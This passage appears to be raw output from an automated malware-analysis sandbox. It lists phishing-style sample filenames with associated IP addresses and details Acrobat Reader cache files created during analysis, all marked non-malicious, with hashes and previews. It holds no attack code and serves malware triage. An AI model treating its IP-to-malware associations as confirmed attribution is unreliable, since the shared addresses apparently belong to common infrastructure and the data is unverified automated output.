                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210
                                                                                                                                                                                                                                                        Colt_Payroll_report.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210
                                                                                                                                                                                                                                                        INV-FACTUUR00921.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210
                                                                                                                                                                                                                                                        Final_Notification.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210
                                                                                                                                                                                                                                                        DHL eMailShip delivery Form - securedPDF.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210
                                                                                                                                                                                                                                                        Jan_Order.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210
                                                                                                                                                                                                                                                        PO-00172020.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        • 13.225.74.123
                                                                                                                                                                                                                                                        • 52.216.105.77
                                                                                                                                                                                                                                                        • 15.236.176.210

                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):820
                                                                                                                                                                                                                                                        Entropy (8bit):5.670803816881926
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:vDRM9+ZiE/DRM94PeZiEthDRM9HPZiEm/hDRM9uv3ZiEw:7KEr5PbEt1QoEW1cEw
                                                                                                                                                                                                                                                        MD5:0A491081D88AC40C1BCD323C6FB158ED
                                                                                                                                                                                                                                                        SHA1:B9B1EEACF8D875ECADF363BF12F41B3D9BC25C38
                                                                                                                                                                                                                                                        SHA-256:DB30BACD869B4446B1A9655ADF4E651E0246C485D6935E01064488F581B94F6B
                                                                                                                                                                                                                                                        SHA-512:1003E3B3439FC94158359BACE8FF8FFEBF9856820A7669E0EDD97559956CEF997496D64F45DEE2016B2DCC684267B05AF356E882A14EF28003FC729BE8A67926
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview: 0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .'tZE.#/....."#.D.....0.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo......G.b........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .5..E.#/....."#.DG>...0.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo......VG.9........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .p..E.#/....."#.D^....0.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo......,F..........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ..7.E.#/....."#.D....0.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo......j.n.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):696
                                                                                                                                                                                                                                                        Entropy (8bit):5.60203649461146
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mi9NqEYOFLvEkHgmi8Be7Ywcr1TK6t7i9NqEYOFLvEkS8Be7Ywcr1TK6tiei9NqI:V9zji9PQM9zy9PQEd9zJ9PQ39ze9PQc
                                                                                                                                                                                                                                                        MD5:536EC9035BFF1739BF7CB2B3C7B9AF9D
                                                                                                                                                                                                                                                        SHA1:D2F8E6D7B27C68361733DF80BC947E2F7D126F39
                                                                                                                                                                                                                                                        SHA-256:0076CFC1535D23D9F826A44896EE8C680FC484B02A50AB25F50C174BB7FB7155
                                                                                                                                                                                                                                                        SHA-512:BC6B20D3523EF84FC8065E198749C16E5180843BBC3FF8AEE26EF0D1D14384400FA7B13688EE9AFF991C8A7393E33C71E9CAD84E8F1E1DF1A3E23649ECB2D5B8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview: 0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ..KJE.#/....."#.D2....0.A.1.x.'.vI..*|Z..o...+.4....0..A..Eo...................A..Eo........f........0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .$..E.#/....."#.D_}8..0.A.1.x.'.vI..*|Z..o...+.4....0..A..Eo...................A..Eo.......5..........0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ...E.#/....."#.D....0.A.1.x.'.vI..*|Z..o...+.4....0..A..Eo...................A..Eo........`?........0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ....E.#/....."#.D2.7..0.A.1.x.'.vI..*|Z..o...+.4....0..A..Eo...................A..Eo.......O2........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):984
                                                                                                                                                                                                                                                        Entropy (8bit):5.618914899012875
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:tB4v4xPSByB4v4FSBqTB4v4jsQSBwB4v4AgGQSB:nM2SBiMiSBqtMGsQSB4MIGQSB
                                                                                                                                                                                                                                                        MD5:655F35F9452FC66E1F5B8B467AEFCDB2
                                                                                                                                                                                                                                                        SHA1:9C76EBB8AEB039E97DD5EC4DD978728B715FC582
                                                                                                                                                                                                                                                        SHA-256:80144F107A83A9A195EE4988739F674F064740876F842600637866939DEBC385
                                                                                                                                                                                                                                                        SHA-512:4DCC3330F09D922C9CEFBA6F7A165FFD207EEB1CFF3410D795E75B14D50EFDB58DC870D603D4D985D421E15832F6E4209F1B24232CA211E7AE423B1740DFF288
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview: 0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ...YE.#/....."#.D+2...0.A..hvDO.N.t@.....n.*...... ....A..Eo...................A..Eo......0|.........0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ....E.#/....."#.D.c...0.A..hvDO.N.t@.....n.*...... ....A..Eo...................A..Eo.......<.<........0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ....E.#/....."#.D.....0.A..hvDO.N.t@.....n.*...... ....A..Eo...................A..Eo......JG.........0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ....E.#/....."#.D-%w..0.A..hvDO.N.t@.....n.*...... ....A..Eo...................A..Eo.......G..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):464
                                                                                                                                                                                                                                                        Entropy (8bit):5.656289025889394
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mNtVYOFLvEWdFCi5Rsq7taNR0iWulHyA1TK6tPMNtVYOFLvEWdFCi5RsNslR0iWO:IbRkiDZJkFWussMbRkiDisnFWussb
                                                                                                                                                                                                                                                        MD5:265296634E8BEF9F4CF3398F48136BBA
                                                                                                                                                                                                                                                        SHA1:3DCCCA836B36AF38AF608DE7BC1DCC63444DE138
                                                                                                                                                                                                                                                        SHA-256:0E55C82247859D0BEA6235E509C3400495D10AC1EF71723EA3DCFAD901F5E4F9
                                                                                                                                                                                                                                                        SHA-512:CC4921470A6BC83D6BA9A1C4813436984B0066BF0BE69F6CE737CE67E9B184FDFCBF06E3BE7E39656B5AC426548AA8AA9C70EFF92B309BFD749329053BE67D17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview: 0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js ..j^E.#/....."#.D.....0.A..8 P..a...R..Y....7.@..2Dm{..A..Eo...................A..Eo......5.nd........0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js .rY.E.#/....."#.D.!-..0.A..8 P..a...R..Y....7.@..2Dm{..A..Eo...................A..Eo.................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                        Entropy (8bit):5.547572590417689
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:m+yiXYOFLvEWd7VIGXVu5RVyh9PT41TK6txle+yiXYOFLvEWd7VIGXVupl9GRVyX:pyixRujRV41TEryixRuORV41TE
                                                                                                                                                                                                                                                        MD5:87CAE90B20FD86E49D563744534AA6A5
                                                                                                                                                                                                                                                        SHA1:D65A356B29EDCFA77224E795E3392E9EDB9908BB
                                                                                                                                                                                                                                                        SHA-256:34F1E220660245A61D0622443D7683F382830E528F459E8C9BF26C05F995192B
                                                                                                                                                                                                                                                        SHA-512:C213C114ACB56796EF72823694174BE36562C0D11250923E8BA9659AF9208E21A8E8B08D66CF14E7F442D80BCCCACDEFC237C517061B37A2FE1436D8EF4C30A3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..v.E.#/....."#.D;s...0.Ak.Q.....-_..y.....O...>..1....A..Eo...................A..Eo......at..........0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js .&~.E.#/....."#.D9.}..0.Ak.Q.....-_..y.....O...>..1....A..Eo...................A..Eo.......N..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                                        Entropy (8bit):5.59232915105424
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mvYOFLvEWdhwjQPsOhLZIl6P41TK6t9XMvYOFLvEWdhwjQcnhLZIl6P41TK6tM:0RhkGs2LZCTXqRhkrLZC
                                                                                                                                                                                                                                                        MD5:23936B1FEF8D1073BB8175D2A9E8A317
                                                                                                                                                                                                                                                        SHA1:3893C756E70B6E5E8B557CAAF6F5515D9D18A818
                                                                                                                                                                                                                                                        SHA-256:59FDEB883975E552B6EBA7543C78AAF0EFEC7170EE2C2C17E098BBC00C5DD04E
                                                                                                                                                                                                                                                        SHA-512:3C01DEDC5BE73DC50B82AEADCD17C8C79C4CBCD17F27D255BC6C4B31FD39195C4E3F19C99E4FAAEC3501F408F6A84B2D2DD8AC46A0A907116015EC9B68415A5F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ....E.#/....."#.D..t..0.A.].>....uUf..N...k......c..l.A..Eo...................A..Eo.......l%.........0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ....E.#/....."#.D..m..0.A.].>....uUf..N...k......c..l.A..Eo...................A..Eo......'.a.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                        Entropy (8bit):5.55454680677488
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mJYOFLvEWdGQRQOdQPfvXV6g1TK6tzJJYOFLvEWdGQRQOdQ4/RnXV6g1TK6t:2RHRQCSfvF17RHRQC9/RnF1
                                                                                                                                                                                                                                                        MD5:7005EED40F5F2A9738EA306416D91BA8
                                                                                                                                                                                                                                                        SHA1:9762CFDE678A6C75DBBA8133397735A380986992
                                                                                                                                                                                                                                                        SHA-256:E743051A07DDB265456557ECBC4322D6DE7242FC1C9D0EC68D6F49AE61387A80
                                                                                                                                                                                                                                                        SHA-512:38C8A4F7D47D225B1B007A68E316B5D216B749DB241C797BEB8BAAF1E9F367707D84100841AA9F75FF0052C0F86FDEA9BEB9F7DA4117A17E5BA37B2A286F0D7F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .Kg.E.#/....."#.D.....0.A..c..y/L....|y.n..C/I.....X7-ne.A..Eo...................A..Eo.................0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ....E.#/....."#.DC:~..0.A..c..y/L....|y.n..C/I.....X7-ne.A..Eo...................A..Eo......z..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):716
                                                                                                                                                                                                                                                        Entropy (8bit):5.578040457973639
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:Z5MN5MuR/EXJ5MC24MuR/EDHB5MZUMuR/Ec5M6MuR/E:ZSwuR/E5SCiuR/EzBSbuR/EcSTuR/E
                                                                                                                                                                                                                                                        MD5:9EE06C4460090D3FB89316B8BFE10DEE
                                                                                                                                                                                                                                                        SHA1:DBA786217B265EE99D160019CC41C824C659E8FE
                                                                                                                                                                                                                                                        SHA-256:AF49DA68403C6E4F94D0D86BE081CE50376E62BAB4B17566BF4762C83CC61A46
                                                                                                                                                                                                                                                        SHA-512:9741CC47159D70EA13A2E78100552A872F13F8D4EAD4AD636CC7C7839D16E4914A01CD7BF9ED5A2C4558035DF38C4F364882C668E1B05A7B11A9240D0ED0A3B4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..oJE.#/....."#.D{....0.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo........9.........0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js .)H.E.#/....."#.D..8..0.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo........_.........0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js .R..E.#/....."#.D.6...0.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo.......-.3........0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ....E.#/....."#.D.<7..0.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo........u.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):212
                                                                                                                                                                                                                                                        Entropy (8bit):5.60025948014847
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mGpYOFLvEWdzAAuHaKWgm0bbsIDMGH41TK6tQ:XfRM9KKsIZE
                                                                                                                                                                                                                                                        MD5:19D089D30212302279F245DD80224B50
                                                                                                                                                                                                                                                        SHA1:3C7F7E3118F0E032365B179CF5F1D95526B10D27
                                                                                                                                                                                                                                                        SHA-256:C861D9F57FC2031CFB768855582B95E7928BA0F5EAB555087F61D2CD9DE06992
                                                                                                                                                                                                                                                        SHA-512:4DC4346F0514A9B81272CFE52A2ED4BA7E142E0DC453CF3ED584F28BD0A3F57CF70AB3684F5B013C4348309E47B4AF62510713F8126AFFFC4608863FEAA9112E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......T....,.^...._keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/selector.js .L..E.#/....."#.D.?...0.A..`.....^....L>..Xa./......C.y.A..Eo...................A..Eo..................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):428
                                                                                                                                                                                                                                                        Entropy (8bit):5.549273590048281
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:m4fPYOFLvEWdtuiFQby0zBUKSAA1TK6tb84fPYOFLvEWdtuv49uby0zBUKSAA1T6:pRkbepR6jbect
                                                                                                                                                                                                                                                        MD5:A6C4E73C8247230CF0650B03C8D325A6
                                                                                                                                                                                                                                                        SHA1:0C0AAC18065C132A07E3BA5B25C62001285DDB93
                                                                                                                                                                                                                                                        SHA-256:DB2A98DAF8F0501CB243ED1BA546BFD2FE1DF7FB00A260C38B55D7BEF0A87334
                                                                                                                                                                                                                                                        SHA-512:472076C981B3AE7F13223851AE70FD9B4B18BDCEBD1BCE7AE1A90A3281320A15911564D98A8E95F27A8D6C0942992362F44B6D4AD311EC376DA3BC62D8CE90E1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js .^!.E.#/....."#.D.....0.AQ..E.=....=h`t..t..3%A.F$..w..A..Eo...................A..Eo.........e........0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js ....E.#/....."#.Dx...0.AQ..E.=....=h`t..t..3%A.F$..w..A..Eo...................A..Eo......lQ.?........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):708
                                                                                                                                                                                                                                                        Entropy (8bit):5.54633744296574
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:KkXxKMSCvJg+tUlm9okXxKMSCvU7ZtUlYkXxKMSCv//otUld4kXxKMSCvzDctUls:KkXxiCtWKokXxiCUWYkXxiCnAWykXxiW
                                                                                                                                                                                                                                                        MD5:33CCF19E67ECE47944B7A0F7FEFA998C
                                                                                                                                                                                                                                                        SHA1:4F3B72677292B7D505416BAA18DBFA66E508F6EB
                                                                                                                                                                                                                                                        SHA-256:10A26858256FA20155ACCD171436B9233B6D5C5B657DBD37B52910CF0A04B49F
                                                                                                                                                                                                                                                        SHA-512:C29456813F2A53EE7C70981123592159274F1C58D36FED79F166034976AB81F381FAE3E38C3F656D62E5EA47E13AEBD2686B9AA46BAD3BBEAE725D6672C35A10
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..lJE.#/....."#.D.....0.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo.......`L.........0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..E.E.#/....."#.D..8..0.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo.........0........0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ....E.#/....."#.Db/...0.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo......;..........0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js .b..E.#/....."#.D.'7..0.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo........M.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):748
                                                                                                                                                                                                                                                        Entropy (8bit):5.596554136744823
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:5h6OLiOkIzh6OLUvyqkShh6OLrkwBh6OLFkOX:5h6LrIzh6xvy/Shh6BOh6z
                                                                                                                                                                                                                                                        MD5:FABE2533884CC615F53B3528F446BEF2
                                                                                                                                                                                                                                                        SHA1:D32530F77626B6462FAD15FDF0CBA5EEBF0FC310
                                                                                                                                                                                                                                                        SHA-256:0603283D9F124EC0BEA02E6BB681C8D007DBEC1290F873C912310C172978DA0C
                                                                                                                                                                                                                                                        SHA-512:A98EB68E64BB2763CB6EDC9C00984085AA180CF8FB97D0A666878DDB346B66D685D34EAA0CD42AF56D1AEF59F7D899A02819A8B189DB67BC5B6063404B6A367E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .ksUE.#/....."#.D.....0.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo........g.........0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ....E.#/....."#.D.%e..0.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo.................0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .}..E.#/....."#.D.....0.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo..................0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .f..E.#/....."#.D.(c..0.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo......r$P.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):976
                                                                                                                                                                                                                                                        Entropy (8bit):5.638611073177741
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:UB4v4+YwzXLnQB4v4NwzXLnCkB4v4K11wzXLnkB4v44wzXLn:8M/NbnYMzbnCsMTEbnsM4bn
                                                                                                                                                                                                                                                        MD5:BA4FEEB2BCA500D4AAC12D03B4E74E15
                                                                                                                                                                                                                                                        SHA1:F4538BC4DEE930C7F6DC4BB3441F00C0DC778A14
                                                                                                                                                                                                                                                        SHA-256:E266BE2DB18EC47C6B385BB085EFFEC31C5737241B800CDE1E9FF00810B40A20
                                                                                                                                                                                                                                                        SHA-512:C911791BC008CEEDABE0AE3DD05602B4E524FE286A5F5C6E61D1104067CF0E1ADA1B0BEB84693F09807D25CDB2217E35F972E3690EC948A52DACCA8651EDB19F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..wZE.#/....."#.D.]...0.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo.......IW.........0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js .pX.E.#/....."#.Dq ...0.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo..................0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js .#V.E.#/....."#.D.S#..0.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo......V..p........0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ....E.#/....."#.D.!...0.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo......m8%.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):210
                                                                                                                                                                                                                                                        Entropy (8bit):5.5317814704880695
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mq9YOFLvEWdzAHdQxOFl5GFCaa+41TK6ttLt:NRMHdCEl5Gda+Er
                                                                                                                                                                                                                                                        MD5:761A29C7B78279FECB2B21E1103C8764
                                                                                                                                                                                                                                                        SHA1:16E3F8928BD7D9EBC8A23FEF4F55F099C9E80911
                                                                                                                                                                                                                                                        SHA-256:86A63DFBD17F29AA9BE606210A7F669A045B2D781C1BDBAA776A4D1D51A881AE
                                                                                                                                                                                                                                                        SHA-512:B09A90FF02D9B243967F88370BBB7738D01761C768BE5FB839DD2DF91924A56637A11BB9AAE898650D49F791D1B561C302A73B25D797DB10672073277E20CF06
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......R....L......_keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/plugin.js .H..E.#/....."#.DKu...0.A...G.3D.....Q.g0...._.Q.........A..Eo...................A..Eo.......\'.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):422
